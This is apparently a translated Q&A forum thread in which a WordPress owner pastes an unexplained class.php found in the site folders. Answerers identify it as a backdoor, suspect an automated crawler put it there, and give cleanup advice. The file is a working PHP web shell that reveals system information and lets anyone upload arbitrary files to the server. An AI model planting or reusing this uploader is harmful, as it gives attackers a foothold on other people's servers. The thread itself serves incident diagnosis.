2014-10-04 41 views
0

一個名爲class.php的文件出現在我的wordpress文件夾和wp-includes/pomo文件夾中。這個文件是什麼? Class.php in wordpress

這是什麼文件?我最近3天沒有編輯我的身邊。

代碼

<?php 
echo '<b>Jundab<br><br>'.php_uname().'<br></b>'; 
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
if($_POST['_upl'] == "Upload") { 
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } 
    else { echo '<b>Upload Fail !!!</b><br><br>'; } 
} 
?> 

請幫助。

+2

看起來有人正在準備入侵。他們已經成功地創建了一個「端點」來上傳惡意腳本。你應該儘快更新你的WordPress和所有插件,檢查權限,刪除不必要的插件,並重置所有用戶密碼。當然,立即刪除該腳本。可能需要額外的措施來確保您已正確清理所有內容。 – lxg 2014-10-04 19:34:04

+0

我同意,這正是它的樣子。 – 2014-10-04 19:43:36

+0

謝謝。我刪除它。 但是,如何獲得訪問我的服務器?我已完全鎖定它,並將我的文件夾權限設置爲705. 謝謝! – Ethan17 2014-10-04 20:39:35

回答

1

看起來像某人建立了自己的後門。很可能這是由一個自動爬蟲尋找易受攻擊的安裝來安裝的。你正在運行一箇舊的WordPress的版本?

相關問題